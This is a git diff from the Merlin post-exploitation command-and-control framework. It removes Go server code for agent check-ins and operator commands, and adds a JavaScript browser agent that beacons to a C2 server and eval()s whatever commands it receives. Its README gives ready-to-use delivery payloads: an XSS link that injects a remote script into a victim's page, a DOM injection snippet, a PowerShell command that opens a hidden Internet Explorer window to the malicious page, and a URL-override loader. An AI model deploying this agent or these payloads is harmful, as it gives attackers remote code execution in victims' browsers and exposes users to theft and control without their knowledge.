-	agents[j.ID].agentLog.WriteString(fmt.Sprintf("\tAgent maxRetry: %d \r\n", p.MaxRetry))
-	agents[j.ID].agentLog.WriteString(fmt.Sprintf("\tAgent failedCheckin: %d \r\n", p.FailedCheckin))
-
-	agents[j.ID].version = p.Version
-	agents[j.ID].build = p.Build
-	agents[j.ID].waitTime = p.WaitTime
-	agents[j.ID].paddingMax = p.PaddingMax
-	agents[j.ID].maxRetry = p.MaxRetry
-	agents[j.ID].failedCheckin = p.FailedCheckin
-}
-
-func statusCheckIn(j messages.Base) messages.Base {
-	// Check to make sure agent UUID is in dataset
-	_, ok := agents[j.ID]
-	if !ok {
-		color.Red("[!]Orphaned agent %s has checked in. Instructing agent to re-initialize...", j.ID.String())
-		serverLog.WriteString(fmt.Sprintf("[%s]Orphaned agent %s has checked in\r\n", time.Now(), j.ID.String()))
-		jobID := randStringBytesMaskImprSrc(10)
-		color.Yellow("[-]Created job %s for agent %s", jobID, j.ID)
-		g := messages.Base{
-			Version: 1.0,
-			ID:      j.ID,
-			Type:    "AgentControl",
-			Padding: randStringBytesMaskImprSrc(paddingMax),
-		}
-		p := messages.AgentControl{
-			Command: "initialize",
-			Job:     jobID,
-		}
-
-		k := marshalMessage(p)
-		g.Payload = (*json.RawMessage)(&k)
-		return g
-	}
-
-	agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]Agent status check in\r\n", time.Now()))
-	if verbose {
-		color.Green("[+]Received agent status checkin from %s", j.ID)
-	}
-	if debug {
-		color.Red("[DEBUG]Received agent status checkin from %s", j.ID)
-		color.Red("[DEBUG]Channel length: %d", len(agents[j.ID].channel))
-		color.Red("[DEBUG]Channel content: %s", agents[j.ID].channel)
-	}
-
-	agents[j.ID].sCheckIn = time.Now()
-	if len(agents[j.ID].channel) >= 1 {
-		command := <-agents[j.ID].channel
-		jobID := randStringBytesMaskImprSrc(10)
-		color.Yellow("[-]Created job %s for agent %s", jobID, j.ID)
-
-		agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]Command Type: %s\r\n", time.Now(), command[1]))
-		agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]Command: %s\r\n", time.Now(), command[3:]))
-		agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]Created job %s for agent %s\r\n", time.Now(), jobID, j.ID))
-
-		m := messages.Base{
-			Version: 1.0,
-			ID:      j.ID,
-			Padding: randStringBytesMaskImprSrc(paddingMax),
-		}
-
-		switch command[1] {
-		case "cmd":
-			p := messages.CmdPayload{
-				Command: command[3],
-				Job:     jobID,
-			}
-			if len(command) > 4 {
-				p.Args = strings.Join(command[4:], " ")
-			}
-
-			k := marshalMessage(p)
-			m.Type = "CmdPayload"
-			m.Payload = (*json.RawMessage)(&k)
-
-			return m
-
-		case "control":
-			p := messages.AgentControl{
-				Command: command[3],
-				Job:     jobID,
-			}
-
-			if len(command) == 5 {
-				p.Args = command[4]
-			}
-
-			k := marshalMessage(p)
-			m.Type = "AgentControl"
-			m.Payload = (*json.RawMessage)(&k)
-
-			if command[3] == "kill" {
-				delete(agents, j.ID)
-			}
-			return m
-
-		case "kill":
-			p := messages.AgentControl{
-				Command: command[1],
-				Job:     jobID,
-			}
-
-			k := marshalMessage(p)
-			m.Type = "AgentControl"
-			m.Payload = (*json.RawMessage)(&k)
-
-			delete(agents, j.ID)
-
-			return m
-
-		default:
-			m.Type = "ServerOk"
-			return m
-		}
-	} else {
-		g := messages.Base{
-			Version: 1.0,
-			ID:      j.ID,
-			Type:    "ServerOk",
-			Padding: randStringBytesMaskImprSrc(paddingMax),
-		}
-		return g
-	}
-
-}
-
-func usage() {
-	color.Yellow("Merlin C2 Server (version %s)", merlin.Version)
-	table := tablewriter.NewWriter(os.Stdout)
-	table.SetAlignment(tablewriter.ALIGN_LEFT)
-	table.SetHeader([]string{"Command", "Arguments", "Options", "Description"})
-
-	data := [][]string{
-		{"agent cmd", "<agent ID> <command>", "", "Run a command on target's operating system"},
-		{"agent control", "<agent ID> <command>", "sleep, kill, padding", "Control messages & " +
-			"functions to the agent itself"},
-		{"agent info", "<agent ID>", "", "Display all information about an agent"},
-		{"agent list", "None", "", "List all checked In agents"},
-		{"exit", "None", "", "Exit the Merlin server"},
-		{"quit", "None", "", "Exit the Merlin server"},
-	}
-
-	table.AppendBulk(data)
-	fmt.Println()
-	table.Render()
-	fmt.Println()
-}
-
-func filterInput(r rune) (rune, bool) {
-	switch r {
-	// block CtrlZ feature
-	case readline.CharCtrlZ:
-		return r, false
-	}
-	return r, true
-}
-
-func getAgentList() func(string) []string {
-	return func(line string) []string {
-		a := make([]string, 0)
-		for k := range agents {
-			a = append(a, k.String())
-		}
-		return a
-	}
-}
-
-func shell() {
-
-	var agentCompleter = readline.PcItemDynamic(getAgentList())
-	var completer = readline.NewPrefixCompleter(
-		readline.PcItem("agent",
-			readline.PcItem("list"),
-			readline.PcItem("info",
-				agentCompleter,
-			),
-			readline.PcItem("cmd",
-				agentCompleter,
-			),
-			readline.PcItem("control",
-				readline.PcItemDynamic(getAgentList(),
-					readline.PcItem("sleep"),
-					readline.PcItem("kill"),
-					readline.PcItem("padding"),
-					readline.PcItem("maxretry"),
-				),
-			),
-			readline.PcItem("kill",
-				agentCompleter,
-			),
-		),
-		readline.PcItem("exit"),
-		readline.PcItem("quit"),
-		readline.PcItem("help"),
-	)
-
-	ms, err := readline.NewEx(&readline.Config{
-		Prompt:              "\033[31mMerlin»\033[0m ",
-		HistoryFile:         "/tmp/readline.tmp",
-		AutoComplete:        completer,
-		InterruptPrompt:     "^C",
-		EOFPrompt:           "exit",
-		HistorySearchFold:   true,
-		FuncFilterInputRune: filterInput,
-	})
-
-	if err != nil {
-		color.Red("[!]There was an error with the provided input")
-		color.Red(err.Error())
-	}
-	defer ms.Close()
-
-	log.SetOutput(ms.Stderr())
-
-	for {
-		line, err := ms.Readline()
-		if err == readline.ErrInterrupt {
-			if len(line) == 0 {
-				break
-			} else {
-				continue
-			}
-		} else if err == io.EOF {
-			break
-		}
-
-		line = strings.TrimSpace(line)
-		cmd := strings.Split(line, " ")
-
-		switch cmd[0] {
-		case "agent":
-			if len(cmd) > 1 {
-				switch cmd[1] {
-				case "list":
-					table := tablewriter.NewWriter(os.Stdout)
-					table.SetHeader([]string{"Agent GUID", "Platform", "User", "Host", "Transport"})
-					table.SetAlignment(tablewriter.ALIGN_CENTER)
-					for k, v := range agents {
-						table.Append([]string{k.String(), v.platform + "/" + v.architecture, v.userName,
-							v.hostName, "HTTP/2"})
-					}
-					fmt.Println()
-					table.Render()
-					fmt.Println()
-				case "info":
-					if len(cmd) == 2 {
-						color.Red("[!]Invalid command")
-						color.White("agent info <agent_id>")
-					} else if len(cmd) >= 3 {
-						a, _ := uuid.FromString(cmd[2])
-						table := tablewriter.NewWriter(os.Stdout)
-						table.SetAlignment(tablewriter.ALIGN_LEFT)
-						data := [][]string{
-							{"ID", agents[a].id.String()},
-							{"Platform", agents[a].platform},
-							{"Architecture", agents[a].architecture},
-							{"UserName", agents[a].userName},
-							{"User GUID", agents[a].userGUID},
-							{"Hostname", agents[a].hostName},
-							{"Process ID", strconv.Itoa(agents[a].pid)},
-							{"Initial Check In", agents[a].iCheckIn.String()},
-							{"Last Check In", agents[a].sCheckIn.String()},
-							{"Agent Version", agents[a].version},
-							{"Agent Build", agents[a].build},
-							{"Agent Wait Time", agents[a].waitTime},
-							{"Agent Message Padding Max", strconv.Itoa(agents[a].paddingMax)},
-							{"Agent Max Retries", strconv.Itoa(agents[a].maxRetry)},
-							{"Agent Failed Logins", strconv.Itoa(agents[a].failedCheckin)},
-						}
-						table.AppendBulk(data)
-						fmt.Println()
-						table.Render()
-						fmt.Println()
-					}
-				case "cmd":
-					if len(cmd) >= 4 {
-						addChannel(cmd)
-						cmdAgent := base64.StdEncoding.EncodeToString([]byte(cmd[3]))
-						if debug {
-							color.Red("[DEBUG]Input: %s", cmd[3])
-							color.Red("[DEBUG]Base64 Input: %s", cmdAgent)
-						}
-					} else {
-						color.Red("[!]Invalid command")
-						color.White("agent cmd <agent ID> <cmd>")
-					}
-				case "kill":
-					if len(cmd) == 3 {
-						addChannel(cmd)
-					} else {
-						color.Red("[!]Invalid command")
-						color.White("agent kill <agent ID>")
-					}
-				case "control":
-					switch cmd[3] {
-					case "kill":
-						addChannel(cmd)
-					case "sleep":
-						if len(cmd) == 5 {
-							_, err := time.ParseDuration(cmd[4])
-							if err != nil {
-								color.Red("[!]There was an error setting the agent sleep time")
-								color.Red(err.Error())
-							} else {
-								addChannel(cmd)
-							}
-						} else {
-							color.Red("[!]Invalid command")
-							color.White("agent control <agent ID> sleep <time>")
-						}
-					case "padding":
-						if len(cmd) == 5 {
-							_, err := strconv.Atoi(cmd[4])
-							if err != nil {
-								color.Red("[!]There was an error setting the agent maximum message padding size")
-								color.Red(err.Error())
-							} else {
-								addChannel(cmd)
-							}
-						} else {
-							color.Red("[!]Invalid command")
-							color.White("agent control <agent ID> padding <size as integer>")
-						}
-					case "maxretry":
-						if len(cmd) == 5 {
-							_, err := strconv.Atoi(cmd[4])
-							if err != nil {
-								color.Red("[!]There was an error setting the agent maximum retries")
-								color.Red(err.Error())
-							} else {
-								addChannel(cmd)
-							}
-						} else {
-							color.Red("[!]Invalid command")
-							color.White("agent control <agent ID> maxretry <tries as integer>")
-						}
-					}
-				default:
-					color.Yellow("[-]Invalid agent command:", line[5:])
-				}
-			} else {
-				color.Yellow("[-]Missing subsequent agent command")
-			}
-		case "help":
-			usage()
-		case "?":
-			usage()
-		case "exit":
-			color.Red("[!]Quitting")
-			serverLog.WriteString(fmt.Sprintf("[%s]Shutting down Merlin Server due to user input", time.Now()))
-			os.Exit(0)
-		case "quit":
-			color.Red("[!]Quitting")
-			serverLog.WriteString(fmt.Sprintf("[%s]Shutting down Merlin Server due to user input", time.Now()))
-			os.Exit(0)
-		case "":
-		default:
-			color.Yellow("[-]Invalid command")
-		}
-	}
-}
-
-func randStringBytesMaskImprSrc(n int) string {
-	// http://stackoverflow.com/questions/22892120/how-to-generate-a-random-string-of-a-fixed-length-in-golang
-	b := make([]byte, n)
-	// A src.Int63() generates 63 random bits, enough for letterIdxMax characters!
-	for i, cache, remain := n-1, src.Int63(), letterIdxMax; i >= 0; {
-		if remain == 0 {
-			cache, remain = src.Int63(), letterIdxMax
-		}
-		if idx := int(cache & letterIdxMask); idx < len(letterBytes) {
-			b[i] = letterBytes[idx]
-			i--
-		}
-		cache >>= letterIdxBits
-		remain--
-	}
-
-	return string(b)
-}
-
-func marshalMessage(m interface{}) []byte {
-	k, err := json.Marshal(m)
-	if err != nil {
-		color.Red("There was an error marshaling the JSON object")
-		color.Red(err.Error())
-	}
-	return k
-}
-
-func addChannel(cmd []string) {
-	a, err := uuid.FromString(cmd[2])
-	if err != nil {
-		color.Red("[!]Error converting passed in string to a UUID")
-		color.Red(err.Error())
-	}
-	s := agents[a].channel
-	s <- cmd
-}
-
-type agent struct {
-	id            uuid.UUID
-	platform      string
-	architecture  string
-	userName      string
-	userGUID      string
-	hostName      string
-	pid           int
-	agentLog      *os.File
-	channel       chan []string
-	iCheckIn      time.Time
-	sCheckIn      time.Time
-	version       string
-	build         string
-	waitTime      string
-	paddingMax    int
-	maxRetry      int
-	failedCheckin int
+	go http2.StartListener(strconv.Itoa(*port), *ip, *crt, *key, "/")
+	cli.Shell()
 }
 
 // TODO Add session ID
@@ -771,3 +71,6 @@ type agent struct {
 // TODO add warning for using distributed TLS cert
 // TODO change default useragent from Go-http-client/2.0
 // TODO add CSRF tokens
+// TODO check if agentLog exists even outside of InitialCheckIn
+// TODO readline for file paths to use with upload
+// TODO handle file names containing a space for upload/download
diff --git a/data/html/README.MD b/data/html/README.MD
new file mode 100644
index 00000000..de00c1b5
--- /dev/null
+++ b/data/html/README.MD
@@ -0,0 +1,3 @@
+# Merlin JavaScript Agent Test Page
+This directory contains an HTML page that is used for testing the Merlin
+ JavaScript Agent. To test, load `merlin.html` into your web browser.
\ No newline at end of file
diff --git a/data/html/merlin.html b/data/html/merlin.html
new file mode 100644
index 00000000..03b0a2ce
--- /dev/null
+++ b/data/html/merlin.html
@@ -0,0 +1,67 @@
+<!DOCTYPE html>
+<!--
+Merlin is a post-exploitation command and control framework.
+This file is part of Merlin.
+Copyright (C) 2018  Russel Van Tuyl
+
+Merlin is free software: you can redistribute it and/or modify
+it under the terms of the GNU General Public License as published by
+the Free Software Foundation, either version 3 of the License, or
+any later version.
+
+Merlin is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+GNU General Public License for more details.
+
+You should have received a copy of the GNU General Public License
+along with Merlin.  If not, see <http://www.gnu.org/licenses/>.
+-->
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <title>Merlin JavaScript Agent Test Page</title>
+    <style>
+        body {
+            background-color: dimgray;
+        }
+    </style>
+</head>
+<body>
+<h1 style="color:blue;text-align:center">Merlin JavaScript Agent Test Page</h1>
+<pre style="color:blue;">
+                              &&&&&&&&
+                             &&&&&&&&&&&&
+                            &&&&&&&&&&&&&&&
+                          &&&&&&&&&&& &&&&
+                         &&&&&&&&&&&&&  &&&&
+                        &&&&&&&&&&&& &  &&&&
+                       &&&&&&&&&&&&&     &&&&
+                      &&&&&&&&&&&&&&&     &&&
+                     &&&&&&&&&&&&&&&&&     &&&
+                    &&&&&&&&&&&&&&&&&&&     &&&
+                   &&&&&&&&&&&&&&&&&&&&&
+                  &&&&&&&&&&&&&&&&&&&&&&&
+                  &&&&&&&&&&&&&&&&&&&&&&&
+                 &&&&&&&&&&&&&&&&&&&&&&&&&
+                &&&&&&&&&&&&&&&&&&&&&&&&&&&
+               &&&&&&&&&&&&&&&&&&&&&&&&&&&&&
+              &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
+             &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
+       &&&&  &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&   &&&
+    &&&&&&  &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&  &&&&&&
+  &&&&&&&   &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&   &&&&&&&
+&&&&&&&&&  &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&  &&&&&&&&&
+&&&&&&&&&&  &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&  &&&&&&&&&&
+&&&&&&&&&&&   &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&   &&&&&&&&&&&
+&&&&&&&&&&&&&     &&&&&&&&&&&&&&&&&&&&&&&     &&&&&&&&&&&&&
+  &&&&&&&&&&&&&&&          MERLIN         &&&&&&&&&&&&&&&
+    &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
+       &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
+           &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
+</pre>
+<div id="merlinLog"></div>
+<script type="text/javascript" src="scripts/merlin.js"></script>
+<script type="text/javascript">verbose=true;</script>
+</body>
+</html>
\ No newline at end of file
diff --git a/data/html/scripts/README.MD b/data/html/scripts/README.MD
new file mode 100644
index 00000000..632068c2
--- /dev/null
+++ b/data/html/scripts/README.MD
@@ -0,0 +1,125 @@
+[![JavaScript Style Guide](https://cdn.rawgit.com/standard/standard/master/badge.svg)](https://github.com/standard/standard)
+
+# Merlin JavaScript Agent
+This version of the Merlin Agent is written in JavaScript and can be run
+in any location that can execute JavaScript. Web browsers can be found
+on a multitude of devices to include computers, tablets, phones, TVs,
+cars, and gaming systems. These are good candidates places to run a
+Merlin agent.
+
+An introductory blog post can be found here:
+https://medium.com/@Ne0nd0g/merlin-javascript-all-up-in-your-browsers-e46d6449382
+
+
+[![asciicast](https://asciinema.org/a/RHKqctghoo9fCkIVZjyMQV0N7.png)](https://asciinema.org/a/RHKqctghoo9fCkIVZjyMQV0N7)
+
+## Usage
+The Merlin JavaScript Agent functions the same as other agents. It is
+controlled through the server using the same commands. It is important
+to note that the Merlin JavaScript Agent is only capable of executing
+JavaScript commands. For example, you could execute `2 + 2` and the
+agent will return `4`. Alternatively, you can execute `alert('Merlin')`
+and a JavaScript alert box will appear on the page where the Merlin
+Agent is running.
+
+## Limitations
+* Browser must support HTTP/2
+* JavaScript XHR calls will fail if using a self-signed/untrusted TLS
+certificate
+* Your commands are limited to the sandbox environment (unless there is
+a vulnerability to escape it)
+* Web browser must stay in the foreground on mobile devices to keep
+running
+
+## JavaScript Override Variable
+The Merlin Server address is hardcoded into the `url` variable inside
+of the JavaScript file. However, the Merlin JavaScript Agent will check
+for existence of the `oURL` variable prior to executing the main
+function. This variable is used to _override_ the hardcoded `url`
+variable. This is useful when you want to deliver the JavaScript file
+but don't want to change the `url` parameter prior to delivery. An
+example of practical application is in the *Deployment Methods* section.
+
+## Deployment Methods
+* Merlin JavaScript Agent Test Page
+* Cross-Site Scripting (XSS)
+* Inject directly into the DOM
+* Windows IE COM Object
+* Override oURLJavaScript variable
+
+### Merlin JavaScript Agent Test Page
+Merlin ships with an HTML page that can be used to test the
+_Merlin JavaScript Agent_. It can be found at `data/html/merlin.html`.
+This page will automatically load the Merlin JavaScript agent, connect
+to the Merlin Server, and start writing verbose messages to the screen.
+The quickest way to try this out it is to use Python and start a simple
+web server in the `html` directory (i.e.
+`cd data/html;python -m SimpleHTTPServer`) and then browse to page with
+`http://127.0.0.1:8000/merlin.html`.
+
+### Cross-Site Scripting (XSS)
+Let's assume that you've found a XSS vulnerability in a GET parameter
+for Acme Widgets. For example the `page` parameter of
+`https://www.acme.com/index.html?page=1` reflects back the value to the
+user. You can exploit this XSS vulnerability to create a link that would
+ deliver a Merlin Agent to a victim if they click the link. An example
+ of the Merlin payload would be `var merlin=document.createElement('scri
+ pt');merlin.src='http://127.0.0.1:8000/scripts/merlin.js';document.head.appendC
+ hild(merlin);`.
+
+ An example of the full payload is:
+
+`https://www.acme.com/index.html?page=var%20merlin=document.createElement('script');merlin.src='http://127.0.0.1:8000/merlin.js';document.head.appendChild(merlin);`
+
+### Inject into the DOM
+Most web browser come with developer tools. These tools can be used to
+execute JavaScript commands on _any page_ that you are viewing. On Firefox
+ you can hit the `F12` key to open the developer Web Console. From
+ there, you can execute this command:
+
+`var merlin=document.createElement('script');merlin.src='http://127.0.0.1:8000/scripts/merlin.js';document.head.appendChild(merlin);`
+
+### Windows IE COM Object
+Using PowerShell, you can create and hide an Internet Explorer COM
+object. This would create an Internet Explorer window, hide it so that
+the user can't see it, and then browse to your malicious page. This
+method also has the most obstacles. The newly created window will not
+trust your self-signed certificates, so you must be using a valid TLS
+certificate. _*For testing*_, you can circumvent this by making the
+windows visible, browsing to the root of your web server, and creating
+an exception in Internet Explorer. After creating the exception, then
+you can navigate the web page to your malicious page and then hide the
+window again. Additionally, Internet Explorer seems to error out if your
+ malicious page is not served from the same place as your Merlin Server.
+ This caused the hidden Internet Explorer window re-appear (made
+visible) on its own.
+
+
+You can use the built-in _Merlin JavaScript Agent Test Page_ to serve
+the payload, but your probably better off creating a page somewhere
+else with minimal HTML. If you decide to serve the _Merlin JavaScript
+Agent Test Page_ to deliver the payload, you can shutdown the server
+giving out the page (not the Merlin Server) right after it is grabbed
+by the client. The malicious HTML page does not need to be available
+after initial delivery. Merlin Server is not currently setup to serve
+the _Merlin JavaScript Agent Test Page_ itself, yet. I will work on
+getting it implemented.
+
+An example PowerShell command is:
+
+`$W=New-Object -com 'InternetExplorer.Application';$W.visible=$False;$W.navigate('http://www.acmewidgets.com:8000/merlin.html')`
+
+### Override URL
+You can host the JavaScript in its original form without having to hard
+code your Merlin Server’s URL in the file. Merlin checks the DOM for the
+`oURL` variable and will use its value to connect back with (if it
+exists). This provides flexibility to dynamically change the Merlin
+Server’s URL on the fly.
+
+Note: If the place you are hosting the file returns the JavaScript file
+with a content-type of `text/plain`, then the _Merlin JavaScript Agent_
+will fail to load due to strict MIME type checking. The precludes you
+from calling the file directly from GitHub. However, if no content-type
+is provided, the agent should run.
+
+An example command is: `var oURL='https://your.merlin.server:443/';var merlin=document.createElement('script');merlin.src='https://some.hosting.provider/merlin.js';document.head.appendChild(merlin);`
\ No newline at end of file
diff --git a/data/html/scripts/merlin.js b/data/html/scripts/merlin.js
new file mode 100644
index 00000000..e4025f59
--- /dev/null
+++ b/data/html/scripts/merlin.js
@@ -0,0 +1,296 @@
+// Merlin is a post-exploitation command and control framework.
+// This file is part of Merlin.
+// Copyright (C) 2018  Russel Van Tuyl
+
+// Merlin is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// any later version.
+
+// Merlin is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+
+// You should have received a copy of the GNU General Public License
+// along with Merlin.  If not, see <http://www.gnu.org/licenses/>.
+
+// Global Variables
+var debug = false;
+var verbose = true;
+var initial = true;
+var hostUUID = guid();
+var version = "1.0";
+var build = "nonRelease";
+var waitTime = 30000; // in milliseconds
+var maxRetry = 7;
+var paddingMax = 4096;
+var failedCheckin = 0;
+var url = "https://127.0.0.1:443/";
+var log = document.getElementById("merlinLog");
+var options = {localeMatcher: "lookup", year: 'numeric', month: 'long', day: 'numeric', hour: 'numeric',
+    minute: 'numeric', second: 'numeric'};
+
+if (debug){console.log("Starting Merlin JavaScript Agent")}
+
+//https://stackoverflow.com/questions/105034/create-guid-uuid-in-javascript
+function guid() {
+    return s4() + s4() + '-' + s4() + '-' + s4() + '-' +
+        s4() + '-' + s4() + s4() + s4();
+}
+
+function s4() {
+    return Math.floor((1 + Math.random()) * 0x10000)
+        .toString(16)
+        .substring(1);
+}
+
+var b = {
+    "version": version,
+    "id": hostUUID,
+    "type": null,
+    "padding": "RandomDataGoesHere", // Not implemented yet
+    "payload": null
+};
+
+function initialCheckIn (){
+
+    if (debug){console.log("[DEBUG]Entering into initialCheckIn function")}
+    var x = new XMLHttpRequest();
+    var p = {
+        "platform": navigator.platform,
+        "architecture": navigator.appCodeName,
+        "username": navigator.userAgent,
+        "userguid": navigator.appVersion,
+        "hostname": document.title
+    };
+    b.type = "InitialCheckIn";
+    b.payload = p;
+    if (verbose){verboseMessage("note", "Connecting to web server at " + url + " for initial check in.")}
+    x.onreadystatechange = function() {
+        if (this.readyState == 4 && this.status == 200) {
+            initial = false;
+            agentInfo();
+            failedCheckin = 0;
+        }
+    };
+    x.open('POST', url, true);
+    x.setRequestHeader("Content-Type", "application/json; charset=UTF-8");
+    if (debug){console.log("[DEBUG]Sending InitialCheckIn XHR")}
+    x.onerror = function(e) {
+        failedCheckin++;
+        verboseMessage("warn", failedCheckin + " out of " + maxRetry + " total failed checkins")
+    };
+    x.send(JSON.stringify(b));
+}
+
+function agentInfo (){
+    if (debug){console.log("[DEBUG]Entering into agentInfo function")}
+    var x = new XMLHttpRequest();
+    var a = {
+        "version": version,
+        "build": build,
+        "waittime": waitTime.toString(),
+        "paddingmax": paddingMax,
+        "maxretry": maxRetry,
+        "failedcheckin": failedCheckin
+    };
+    b.type = "AgentInfo";
+    b.payload = a;
+    if (verbose){verboseMessage("note", "Connecting to web server at " + url + " to update agent configuration " +
+        "information.")}
+    x.onreadystatechange = function() {
+        if (this.readyState == 4 && this.status == 200) {
+            main();
+        }
+    };
+    x.open('POST', url, true);
+    x.setRequestHeader("Content-Type", "application/json; charset=UTF-8");
+    if (debug){console.log("[DEBUG]Sending AgentInfo XHR")}
+    x.send(JSON.stringify(b));
+}
+
+function statusCheckIn (){
+    if (debug){console.log("[DEBUG]Entering into statusCheckIn function")}
+    var x = new XMLHttpRequest();
+    b.type = "StatusCheckIn";
+    x.onreadystatechange = function() {
+        if (this.readyState == 4 && this.status == 200) {
+            failedCheckin = 0;
+            var j = JSON.parse(x.responseText);
+            processJSON(j.type, j);
+        }
+    };
+    if (verbose){verboseMessage("note", "Connecting to web server at " + url + " for status check in.")}
+    x.open('POST', url, true);
+    x.setRequestHeader("Content-Type", "application/json; charset=UTF-8");
+    if (debug){console.log("[DEBUG]Sending StatusCheckIn XHR")}
+    x.onerror = function(e) {
+        failedCheckin++;
+        verboseMessage("warn", failedCheckin + " out of " + maxRetry + " total failed checkins")
+    };
+    x.send(JSON.stringify(b));
+}
+
+function cmdResults(job, stdOut, stdErr){
+    if (debug){console.log("[DEBUG]Entering into cmdResults function")}
+    var x = new XMLHttpRequest();
+    var p = {
+        "job": job,
+        "stdout": stdOut,
+        "stderr": stdErr
+    };
+    b.type = "CmdResults";
+    b.payload = p;
+    if (verbose){verboseMessage("note", "Connecting to web server at " + url + " for CmdResults message.")}
+    x.open('POST', url, true);
+    x.setRequestHeader("Content-Type", "application/json; charset=UTF-8");
+    if (debug){console.log("[DEBUG]Sending cmdResults XHR")}
+    x.onerror = function(e) {
+        verboseMessage("warn", "There was an error sending the CmdResults message.")
+    };
+    x.send(JSON.stringify(b));
+}
+
+function verboseMessage(type, message){
+    if (verbose && log != null){
+        switch (type){
+            case "success":
+                log.insertAdjacentHTML("beforeend", "<div style=\"color:lawngreen;\">[+]" + message + "</div>");
+                break;
+            case "note":
+                log.insertAdjacentHTML("beforeend", "<div style=\"color:yellow;\">[-]" + message + "</div>");
+                break;
+            case "warn":
+                log.insertAdjacentHTML("beforeend", "<div style=\"color:orangered;\">[!]" + message + "</div>");
+                break;
+            default:
+                log.insertAdjacentHTML("beforeend", "<div style=\"color:red;\">[!]Unrecognized message type: " + type +
+                    "<br>Message: " +  message + "</div>");
+                break;
+        }
+    }
+}
+
+function processJSON(type, json){
+    verboseMessage("success", type + " message type received!");
+    switch (type){
+        case "ServerOk":
+            break;
+        case "CmdPayload":
+            verboseMessage("note", "Executing command: " + json.payload['executable'] + " " + json.payload['args']);
+            var stdOut;
+            var stdErr;
+            try {
+                stdOut = eval(json.payload['executable'] + " " + json.payload['args']);
+                if (typeof stdOut == "undefined") {
+                    stdOut = "JavaScript command completed successfully and returned type 'undefined'"
+                } else {
+                    stdOut = stdOut.toString();
+                }
+                stdErr = "";
+                verboseMessage("success", "Command output: " + stdOut);
+            } catch (e){
+                stdErr = e.toString();
+                verboseMessage("warn", "There was an error processing the command: " + stdErr);
+                stdOut = "";
+            }
+            cmdResults(json.payload['job'], stdOut, stdErr);
+            break;
+        case "AgentControl":
+            switch (json.payload["command"]){
+                case "kill":
+                    verboseMessage("warn", "Received Agent Kill Message");
+                    clearInterval(run);
+                    //cmdResults(json.payload['job'],"Agent " + hostUUID + " successfully killed.", "");
+                    break;
+                case "sleep":
+                    verboseMessage("note", "Setting agent sleep time to " + json.payload["args"] + " milliseconds");
+                    var i = parseInt(json.payload["args"]);
+                    if (!isNaN(i)){
+                        waitTime = i;
+                        cmdResults(json.payload['job'],"Agent sleep successfully set to " + waitTime +
+                            " milliseconds.", "");
+                        agentInfo();
+                    } else {
+                        verboseMessage("warn", "There was an error setting sleep to " + json.payload["args"]);
+                        cmdResults(json.payload['job'],"","Setting agent sleep time failed.");
+                    }
+                    break;
+                case "initialize":
+                    verboseMessage("note", "Received agent re-initialize message");
+                    initial = true;
+                    break;
+                case "maxretry":
+                    verboseMessage("note","Setting agent max retries to " + json.payload["args"]);
+                    var i = parseInt(json.payload["args"]);
+                    if (!isNaN(i)){
+                        maxRetry = i;
+                        cmdResults(json.payload['job'],"Agent maxretry successfully set to " + maxRetry + ".", "");
+                        agentInfo();
+                    } else {
+                        verboseMessage("warn", "There was an error setting max retries to " + json.payload["args"]);
+                        cmdResults(json.payload['job'],"","Setting agent maxretry failed.");
+                    }
+                    break;
+                case "padding":
+                    verboseMessage("note", "Setting agent message maximum padding size to " + json.payload["args"]);
+                    var i = parseInt(json.payload["args"]);
+                    if (!isNaN(i)){
+                        paddingMax = i;
+                        cmdResults(json.payload['job'],"Agent padding max successfully set to " + paddingMax +
+                            " bytes.", "");
+                        agentInfo();
+                    } else {
+                        verboseMessage("warn", "There was an error setting padding max to " + json.payload["args"]);
+                        cmdResults(json.payload['job'],"","Setting agent padding max failed.");
+                    }
+                    break;
+                default:
+                    verboseMessage("warn", "Unknown AgentControl control type: " + json.payload["command"]);
+                    cmdResults(json.payload['job'],"","Unknown AgentControl control type: " + json.payload["command"]);
+                    break;
+            }
+            break;
+        case "FileTransfer":
+            cmdResults(json.payload['job'],"","File transfer has not been implemented in the JavaScript Agent!");
+            break;
+        default:
+            verboseMessage("warn", "Unknown message type: " + type);
+            cmdResults(json.payload['job'],"","Unknown message type: " + type);
+            break;
+    }
+}
+
+function main(){
+    if (debug){console.log("[DEBUG]Entering into main function")}
+    if (failedCheckin < maxRetry) {
+        if (initial) {
+            initialCheckIn();
+        } else if (!initial) {
+            statusCheckIn();
+        }
+    } else if (failedCheckin == maxRetry){
+        verboseMessage("warn", "Max retries of " + maxRetry + " reached, shutting down the agent.");
+        clearInterval(run);
+        return;
+    }
+    if (verbose){var today  = new Date();verboseMessage("note", "Sleeping for " + waitTime + " milliseconds at " +
+        today.toLocaleString("en-US", options))}
+}
+
+// Check for overide URL
+if (typeof oURL == 'string'){url=oURL}
+
+if (verbose){
+    verboseMessage("success", "Starting Merlin JavaScript Agent");
+    verboseMessage("note", "Agent version:" + version);
+    verboseMessage("note", "Agent build: " + build);
+    verboseMessage("note", "Agent UUID: " + hostUUID);
+    verboseMessage("note", "Platform: " + navigator.appCodeName);
+    verboseMessage("note", "Architecture: " + navigator.platform);
+    verboseMessage("note", "User Name: " + navigator.userAgent);
